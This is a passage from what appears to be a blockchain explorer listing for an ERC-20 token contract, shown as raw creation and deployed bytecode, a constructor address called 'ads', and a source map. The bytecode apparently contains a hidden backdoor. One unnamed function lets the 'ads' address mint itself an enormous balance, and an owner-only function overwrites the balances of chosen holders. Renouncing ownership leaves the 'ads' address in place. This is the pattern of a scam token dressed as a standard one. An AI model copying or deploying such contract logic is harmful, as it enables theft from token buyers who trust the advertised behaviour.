f8484611874565b905092915050565b600061199d826112d4565b91506119a8836112d4565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156119e1576119e061178f565b5b828202905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611a226020836111b2565b9150611a2d826119ec565b602082019050919050565b60006020820190508181036000830152611a5181611a15565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611ab46025836111b2565b9150611abf82611a58565b604082019050919050565b60006020820190508181036000830152611ae381611aa7565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000604082019050611b2e6000830185611380565b611b3b6020830184611380565b9392505050565b6000611b4d826112d4565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff821415611b8057611b7f61178f565b5b600182019050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611be76024836111b2565b9150611bf282611b8b565b604082019050919050565b60006020820190508181036000830152611c1681611bda565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611c796022836111b2565b9150611c8482611c1d565b604082019050919050565b60006020820190508181036000830152611ca881611c6c565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74207a65726f0000000000600082015250565b6000611ce5601b836111b2565b9150611cf082611caf565b602082019050919050565b60006020820190508181036000830152611d1481611cd8565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611d776025836111b2565b9150611d8282611d1b565b604082019050919050565b60006020820190508181036000830152611da681611d6a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611e096023836111b2565b9150611e1482611dad565b604082019050919050565b60006020820190508181036000830152611e3881611dfc565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e9b6026836111b2565b9150611ea682611e3f565b604082019050919050565b60006020820190508181036000830152611eca81611e8e565b905091905056fea2646970667358221220ed2fa607ef5fc0d8afa339c26ba06d42fa36f427a71e729bc8a4e3372ba9707d64736f6c634300080c00330000000000000000000000005560b639979972a0cc7e8058f8a37d9d75555feb

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a2578063a457c2d711610071578063a457c2d7146102aa578063a9059cbb146102da578063dd62ed3e1461030a578063fb86a4041461033a578063fc7bd038146103585761010b565b806370a0823114610234578063880ad0af146102645780638da5cb5b1461026e57806395d89b411461028c5761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca5780634a8d1348146101fa578063671f3db8146102185761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610374565b6040516101259190611240565b60405180910390f35b6101486004803603810190610143919061130a565b610406565b6040516101559190611365565b60405180910390f35b610166610424565b604051610173919061138f565b60405180910390f35b610196600480360381019061019191906113aa565b61042e565b6040516101a39190611365565b60405180910390f35b6101b4610526565b6040516101c19190611419565b60405180910390f35b6101e460048036038101906101df919061130a565b61052f565b6040516101f19190611365565b60405180910390f35b6102026105db565b60405161020f9190611443565b60405180910390f35b610232600480360381019061022d919061145e565b610605565b005b61024e6004803603810190610249919061148b565b610799565b60405161025b919061138f565b60405180910390f35b61026c6107e2565b005b61027661091e565b6040516102839190611443565b60405180910390f35b610294610947565b6040516102a19190611240565b60405180910390f35b6102c460048036038101906102bf919061130a565b6109d9565b6040516102d19190611365565b60405180910390f35b6102f460048036038101906102ef919061130a565b610ac4565b6040516103019190611365565b60405180910390f35b610324600480360381019061031f91906114b8565b610ae2565b604051610331919061138f565b60405180910390f35b610342610b69565b60405161034f919061138f565b60405180910390f35b610372600480360381019061036d9190611640565b610b8a565b005b606060048054610383906116cb565b80601f01602080910402602001604051908101604052809291908181526020018280546103af906116cb565b80156103fc5780601f106103d1576101008083540402835291602001916103fc565b820191906000526020600020905b8154815290600101906020018083116103df57829003601f168201915b5050505050905090565b600061041a610413610d23565b8484610d2b565b6001905092915050565b6000600354905090565b600061043b848484610ef6565b6000600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610486610d23565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610506576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104fd9061176f565b60405180910390fd5b61051a85610512610d23565b858403610d2b565b60019150509392505050565b60006012905090565b60006105d161053c610d23565b84846002600061054a610d23565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546105cc91906117be565b610d2b565b6001905092915050565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b61060d610d23565b73ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156107955760006012600a6106729190611947565b637d2b75006106819190611992565b90506000615208826106939190611992565b90506000600180600180856106a89190611992565b6106b29190611992565b6106bc9190611992565b6106c69190611992565b905083816106d49190611992565b905080600160006106e3610d23565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461072c91906117be565b925050819055503373ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461078d57600080fd5b505050610796565b5b50565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107ea610d23565b73ffffffffffffffffffffffffffffffffffffffff1661080861091e565b73ffffffffffffffffffffffffffffffffffffffff161461085e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161085590611a38565b60405180910390fd5b61dead73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a361dead6000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060058054610956906116cb565b80601f0160208091040260200160405190810160405280929190818152602001828054610982906116cb565b80156109cf5780601f106109a4576101008083540402835291602001916109cf565b820191906000526020600020905b8154815290600101906020018083116109b257829003601f168201915b5050505050905090565b600080600260006109e8610d23565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610aa5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a9c90611aca565b60405180910390fd5b610ab9610ab0610d23565b85858403610d2b565b600191505092915050565b6000610ad8610ad1610d23565b8484610ef6565b6001905092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6012600a610b779190611947565b6404e3b29200610b879190611992565b81565b610b92610d23565b73ffffffffffffffffffffffffffffffffffffffff16610bb061091e565b73ffffffffffffffffffffffffffffffffffffffff1614610c06576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bfd90611a38565b60405180910390fd5b60005b8251811015610d1e576000838281518110610c2757610c26611aea565b5b602002602001015190506000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905083600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff167fd551363168ce4784e28e5d59fc07cbea2191657416e05f6e8cd8f1086eb91e6d8286604051610d01929190611b19565b60405180910390a250508080610d1690611b42565b915050610c09565b505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d9b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9290611bfd565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e0b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e0290611c8f565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ee9919061138f565b60405180910390a3505050565b60008111610f39576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f3090611cfb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610fa9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fa090611d8d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611019576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161101090611e1f565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156110a0576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161109790611eb1565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461113591906117be565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611199919061138f565b60405180910390a350505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156111e15780820151818401526020810190506111c6565b838111156111f0576000848401525b50505050565b6000601f19601f8301169050919050565b6000611212826111a7565b61121c81856111b2565b935061122c8185602086016111c3565b611235816111f6565b840191505092915050565b6000602082019050818103600083015261125a8184611207565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112a182611276565b9050919050565b6112b181611296565b81146112bc57600080fd5b50565b6000813590506112ce816112a8565b92915050565b6000819050919050565b6112e7816112d4565b81146112f257600080fd5b50565b600081359050611304816112de565b92915050565b600080604083850312156113215761132061126c565b5b600061132f858286016112bf565b9250506020611340858286016112f5565b9150509250929050565b60008115159050919050565b61135f8161134a565b82525050565b600060208201905061137a6000830184611356565b92915050565b611389816112d4565b82525050565b60006020820190506113a46000830184611380565b92915050565b6000806000606084860312156113c3576113c261126c565b5b60006113d1868287016112bf565b93505060206113e2868287016112bf565b92505060406113f3868287016112f5565b9150509250925092565b600060ff82169050919050565b611413816113fd565b82525050565b600060208201905061142e600083018461140a565b92915050565b61143d81611296565b82525050565b60006020820190506114586000830184611434565b92915050565b6000602082840312156114745761147361126c565b5b6000611482848285016112f5565b91505092915050565b6000602082840312156114a1576114a061126c565b5b60006114af848285016112bf565b91505092915050565b600080604083850312156114cf576114ce61126c565b5b60006114dd858286016112bf565b92505060206114ee858286016112bf565b9150509250929050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b611535826111f6565b810181811067ffffffffffffffff82111715611554576115536114fd565b5b80604052505050565b6000611567611262565b9050611573828261152c565b919050565b600067ffffffffffffffff821115611593576115926114fd565b5b602082029050602081019050919050565b600080fd5b60006115bc6115b784611578565b61155d565b905080838252602082019050602084028301858111156115df576115de6115a4565b5b835b8181101561160857806115f488826112bf565b8452602084019350506020810190506115e1565b5050509392505050565b600082601f830112611627576116266114f8565b5b81356116378482602086016115a9565b91505092915050565b600080604083850312156116575761165661126c565b5b600083013567ffffffffffffffff81111561167557611674611271565b5b61168185828601611612565b9250506020611692858286016112f5565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806116e357607f821691505b602082108114156116f7576116f661169c565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b60006117596028836111b2565b9150611764826116fd565b604082019050919050565b600060208201905081810360008301526117888161174c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006117c9826112d4565b91506117d4836112d4565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156118095761180861178f565b5b828201905092915050565b60008160011c9050919050565b6000808291508390505b600185111561186b578086048111156118475761184661178f565b5b60018516156118565780820291505b808102905061186485611814565b945061182b565b94509492505050565b6000826118845760019050611940565b816118925760009050611940565b81600181146118a857600281146118b2576118e1565b6001915050611940565b60ff8411156118c4576118c361178f565b5b8360020a9150848211156118db576118da61178f565b5b50611940565b5060208310610133831016604e8410600b84101617156119165782820a9050838111156119115761191061178f565b5b611940565b6119238484846001611821565b9250905081840481111561193a5761193961178f565b5b81810290505b9392505050565b6000611952826112d4565b915061195d836113fd565b925061198a7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484611874565b905092915050565b600061199d826112d4565b91506119a8836112d4565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156119e1576119e061178f565b5b828202905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611a226020836111b2565b9150611a2d826119ec565b602082019050919050565b60006020820190508181036000830152611a5181611a15565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611ab46025836111b2565b9150611abf82611a58565b604082019050919050565b60006020820190508181036000830152611ae381611aa7565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000604082019050611b2e6000830185611380565b611b3b6020830184611380565b9392505050565b6000611b4d826112d4565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff821415611b8057611b7f61178f565b5b600182019050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611be76024836111b2565b9150611bf282611b8b565b604082019050919050565b60006020820190508181036000830152611c1681611bda565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611c796022836111b2565b9150611c8482611c1d565b604082019050919050565b60006020820190508181036000830152611ca881611c6c565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74207a65726f0000000000600082015250565b6000611ce5601b836111b2565b9150611cf082611caf565b602082019050919050565b60006020820190508181036000830152611d1481611cd8565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611d776025836111b2565b9150611d8282611d1b565b604082019050919050565b60006020820190508181036000830152611da681611d6a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611e096023836111b2565b9150611e1482611dad565b604082019050919050565b60006020820190508181036000830152611e3881611dfc565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e9b6026836111b2565b9150611ea682611e3f565b604082019050919050565b60006020820190508181036000830152611eca81611e8e565b905091905056fea2646970667358221220ed2fa607ef5fc0d8afa339c26ba06d42fa36f427a71e729bc8a4e3372ba9707d64736f6c634300080c0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000005560b639979972a0cc7e8058f8a37d9d75555feb

-----Decoded View---------------
Arg [0] : ads (address): 0x5560B639979972a0CC7e8058F8A37d9d75555Feb

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000005560b639979972a0cc7e8058f8a37d9d75555feb


Deployed Bytecode Sourcemap

6451:8546:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8076:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10469:184;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8739:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10993:529;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8527:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11869:225;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7052:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7147:394;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9037:143;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5485:230;;;:::i;:::-;;5796:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8289:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12426:460;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9474:200;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9976:164;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6816:68;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7635:332;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8076:100;8130:13;8163:5;8156:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8076:100;:::o;10469:184::-;10572:4;10589:34;10598:12;:10;:12::i;:::-;10612:2;10616:6;10589:8;:34::i;:::-;10641:4;10634:11;;10469:184;;;;:::o;8739:108::-;8800:7;8827:12;;8820:19;;8739:108;:::o;10993:529::-;11133:4;11150:36;11160:6;11168:9;11179:6;11150:9;:36::i;:::-;11199:24;11226:11;:19;11238:6;11226:19;;;;;;;;;;;;;;;:33;11246:12;:10;:12::i;:::-;11226:33;;;;;;;;;;;;;;;;11199:60;;11312:6;11292:16;:26;;11270:116;;;;;;;;;;;;:::i;:::-;;;;;;;;;11422:57;11431:6;11439:12;:10;:12::i;:::-;11472:6;11453:16;:25;11422:8;:57::i;:::-;11510:4;11503:11;;;10993:529;;;;;:::o;8527:100::-;8585:5;6807:2;8603:16;;8527:100;:::o;11869:225::-;11977:4;11994:70;12003:12;:10;:12::i;:::-;12017:2;12053:10;12021:11;:25;12033:12;:10;:12::i;:::-;12021:25;;;;;;;;;;;;;;;:29;12047:2;12021:29;;;;;;;;;;;;;;;;:42;;;;:::i;:::-;11994:8;:70::i;:::-;12082:4;12075:11;;11869:225;;;;:::o;7052:87::-;7091:7;7118:13;;;;;;;;;;;7111:20;;7052:87;:::o;7147:394::-;7220:12;:10;:12::i;:::-;7203:29;;:13;;;;;;;;;;;:29;;;7200:334;;;7248:12;6807:2;7274;:13;;;;:::i;:::-;7263:10;:24;;;;:::i;:::-;7248:39;;7302:15;7325:5;7320:4;:10;;;;:::i;:::-;7302:28;;7345:9;7371:1;7369;7367;7365;7357:7;:9;;;;:::i;:::-;:11;;;;:::i;:::-;:13;;;;:::i;:::-;:15;;;;:::i;:::-;7345:27;;7401:6;7394:4;:13;;;;:::i;:::-;7387:20;;7449:4;7422:9;:23;7432:12;:10;:12::i;:::-;7422:23;;;;;;;;;;;;;;;;:31;;;;;;;:::i;:::-;;;;;;;;7493:10;7476:27;;:13;;;;;;;;;;;:27;;;7468:36;;;;;;7233:283;;;7200:334;;;;7147:394;:::o;9037:143::-;9127:7;9154:9;:18;9164:7;9154:18;;;;;;;;;;;;;;;;9147:25;;9037:143;;;:::o;5485:230::-;5070:12;:10;:12::i;:::-;5059:23;;:7;:5;:7::i;:::-;:23;;;5051:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5592:42:::1;5555:81;;5576:6;::::0;::::1;;;;;;;;5555:81;;;;;;;;;;;;5664:42;5647:6;::::0;:60:::1;;;;;;;;;;;;;;;;;;5485:230::o:0;5796:87::-;5842:7;5869:6;;;;;;;;;;;5862:13;;5796:87;:::o;8289:104::-;8345:13;8378:7;8371:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8289:104;:::o;12426:460::-;12539:4;12556:24;12583:11;:25;12595:12;:10;:12::i;:::-;12583:25;;;;;;;;;;;;;;;:29;12609:2;12583:29;;;;;;;;;;;;;;;;12556:56;;12665:15;12645:16;:35;;12623:122;;;;;;;;;;;;:::i;:::-;;;;;;;;;12781:62;12790:12;:10;:12::i;:::-;12804:2;12827:15;12808:16;:34;12781:8;:62::i;:::-;12874:4;12867:11;;;12426:460;;;;:::o;9474:200::-;9585:4;9602:42;9612:12;:10;:12::i;:::-;9626:9;9637:6;9602:9;:42::i;:::-;9662:4;9655:11;;9474:200;;;;:::o;9976:164::-;10084:7;10111:11;:17;10123:4;10111:17;;;;;;;;;;;;;;;:21;10129:2;10111:21;;;;;;;;;;;;;;;;10104:28;;9976:164;;;;:::o;6816:68::-;6807:2;6868;:15;;;;:::i;:::-;6850:14;:34;;;;:::i;:::-;6816:68;:::o;7635:332::-;5070:12;:10;:12::i;:::-;5059:23;;:7;:5;:7::i;:::-;:23;;;5051:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;7726:9:::1;7721:239;7745:8;:15;7741:1;:19;7721:239;;;7778:15;7796:8;7805:1;7796:11;;;;;;;;:::i;:::-;;;;;;;;7778:29;;7818:17;7838:9;:18;7848:7;7838:18;;;;;;;;;;;;;;;;7818:38;;7888:6;7867:9;:18;7877:7;7867:18;;;;;;;;;;;;;;;:27;;;;7921:7;7910:38;;;7930:9;7941:6;7910:38;;;;;;;:::i;:::-;;;;;;;;7767:193;;7762:3;;;;;:::i;:::-;;;;7721:239;;;;7635:332:::0;;:::o;3849:98::-;3902:7;3929:10;3922:17;;3849:98;:::o;14638:356::-;14784:1;14768:18;;:4;:18;;;;14760:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;14860:1;14846:16;;:2;:16;;;;14838:63;;;;;;;;;;;;:::i;:::-;;;;;;;;;14938:6;14914:11;:17;14926:4;14914:17;;;;;;;;;;;;;;;:21;14932:2;14914:21;;;;;;;;;;;;;;;:30;;;;14975:2;14960:26;;14969:4;14960:26;;;14979:6;14960:26;;;;;;:::i;:::-;;;;;;;;14638:356;;;:::o;13156:712::-;13305:1;13296:6;:10;13288:50;;;;;;;;;;;;:::i;:::-;;;;;;;;;13375:1;13357:20;;:6;:20;;;;13349:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;13459:1;13438:23;;:9;:23;;;;13430:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;13514:21;13538:9;:17;13548:6;13538:17;;;;;;;;;;;;;;;;13514:41;;13605:6;13588:13;:23;;13566:111;;;;;;;;;;;;:::i;:::-;;;;;;;;;13749:6;13733:13;:22;13713:9;:17;13723:6;13713:17;;;;;;;;;;;;;;;:42;;;;13801:6;13777:9;:20;13787:9;13777:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;13842:9;13825:35;;13834:6;13825:35;;;13853:6;13825:35;;;;;;:::i;:::-;;;;;;;;13277:591;13156:712;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:307::-;355:1;365:113;379:6;376:1;373:13;365:113;;;464:1;459:3;455:11;449:18;445:1;440:3;436:11;429:39;401:2;398:1;394:10;389:15;;365:113;;;496:6;493:1;490:13;487:101;;;576:1;567:6;562:3;558:16;551:27;487:101;336:258;287:307;;;:::o;600:102::-;641:6;692:2;688:7;683:2;676:5;672:14;668:28;658:38;;600:102;;;:::o;708:364::-;796:3;824:39;857:5;824:39;:::i;:::-;879:71;943:6;938:3;879:71;:::i;:::-;872:78;;959:52;1004:6;999:3;992:4;985:5;981:16;959:52;:::i;:::-;1036:29;1058:6;1036:29;:::i;:::-;1031:3;1027:39;1020:46;;800:272;708:364;;;;:::o;1078:313::-;1191:4;1229:2;1218:9;1214:18;1206:26;;1278:9;1272:4;1268:20;1264:1;1253:9;1249:17;1242:47;1306:78;1379:4;1370:6;1306:78;:::i;:::-;1298:86;;1078:313;;;;:::o;1397:75::-;1430:6;1463:2;1457:9;1447:19;;1397:75;:::o;1478:117::-;1587:1;1584;1577:12;1601:117;1710:1;1707;1700:12;1724:126;1761:7;1801:42;1794:5;1790:54;1779:65;;1724:126;;;:::o;1856:96::-;1893:7;1922:24;1940:5;1922:24;:::i;:::-;1911:35;;1856:96;;;:::o;1958:122::-;2031:24;2049:5;2031:24;:::i;:::-;2024:5;2021:35;2011:63;;2070:1;2067;2060:12;2011:63;1958:122;:::o;2086:139::-;2132:5;2170:6;2157:20;2148:29;;2186:33;2213:5;2186:33;:::i;:::-;2086:139;;;;:::o;2231:77::-;2268:7;2297:5;2286:16;;2231:77;;;:::o;2314:122::-;2387:24;2405:5;2387:24;:::i;:::-;2380:5;2377:35;2367:63;;2426:1;2423;2416:12;2367:63;2314:122;:::o;2442:139::-;2488:5;2526:6;2513:20;2504:29;;2542:33;2569:5;2542:33;:::i;:::-;2442:139;;;;:::o;2587:474::-;2655:6;2663;2712:2;2700:9;2691:7;2687:23;2683:32;2680:119;;;2718:79;;:::i;:::-;2680:119;2838:1;2863:53;2908:7;2899:6;2888:9;2884:22;2863:53;:::i;:::-;2853:63;;2809:117;2965:2;2991:53;3036:7;3027:6;3016:9;3012:22;2991:53;:::i;:::-;2981:63;;2936:118;2587:474;;;;;:::o;3067:90::-;3101:7;3144:5;3137:13;3130:21;3119:32;;3067:90;;;:::o;3163:109::-;3244:21;3259:5;3244:21;:::i;:::-;3239:3;3232:34;3163:109;;:::o;3278:210::-;3365:4;3403:2;3392:9;3388:18;3380:26;;3416:65;3478:1;3467:9;3463:17;3454:6;3416:65;:::i;:::-;3278:210;;;;:::o;3494:118::-;3581:24;3599:5;3581:24;:::i;:::-;3576:3;3569:37;3494:118;;:::o;3618:222::-;3711:4;3749:2;3738:9;3734:18;3726:26;;3762:71;3830:1;3819:9;3815:17;3806:6;3762:71;:::i;:::-;3618:222;;;;:::o;3846:619::-;3923:6;3931;3939;3988:2;3976:9;3967:7;3963:23;3959:32;3956:119;;;3994:79;;:::i;:::-;3956:119;4114:1;4139:53;4184:7;4175:6;4164:9;4160:22;4139:53;:::i;:::-;4129:63;;4085:117;4241:2;4267:53;4312:7;4303:6;4292:9;4288:22;4267:53;:::i;:::-;4257:63;;4212:118;4369:2;4395:53;4440:7;4431:6;4420:9;4416:22;4395:53;:::i;:::-;4385:63;;4340:118;3846:619;;;;;:::o;4471:86::-;4506:7;4546:4;4539:5;4535:16;4524:27;;4471:86;;;:::o;4563:112::-;4646:22;4662:5;4646:22;:::i;:::-;4641:3;4634:35;4563:112;;:::o;4681:214::-;4770:4;4808:2;4797:9;4793:18;4785:26;;4821:67;4885:1;4874:9;4870:17;4861:6;4821:67;:::i;:::-;4681:214;;;;:::o;4901:118::-;4988:24;5006:5;4988:24;:::i;:::-;4983:3;4976:37;4901:118;;:::o;5025:222::-;5118:4;5156:2;5145:9;5141:18;5133:26;;5169:71;5237:1;5226:9;5222:17;5213:6;5169:71;:::i;:::-;5025:222;;;;:::o;5253:329::-;5312:6;5361:2;5349:9;5340:7;5336:23;5332:32;5329:119;;;5367:79;;:::i;:::-;5329:119;5487:1;5512:53;5557:7;5548:6;5537:9;5533:22;5512:53;:::i;:::-;5502:63;;5458:117;5253:329;;;;:::o;5588:::-;5647:6;5696:2;5684:9;5675:7;5671:23;5667:32;5664:119;;;5702:79;;:::i;:::-;5664:119;5822:1;5847:53;5892:7;5883:6;5872:9;5868:22;5847:53;:::i;:::-;5837:63;;5793:117;5588:329;;;;:::o;5923:474::-;5991:6;5999;6048:2;6036:9;6027:7;6023:23;6019:32;6016:119;;;6054:79;;:::i;:::-;6016:119;6174:1;6199:53;6244:7;6235:6;6224:9;6220:22;6199:53;:::i;:::-;6189:63;;6145:117;6301:2;6327:53;6372:7;6363:6;6352:9;6348:22;6327:53;:::i;:::-;6317:63;;6272:118;5923:474;;;;;:::o;6403:117::-;6512:1;6509;6502:12;6526:180;6574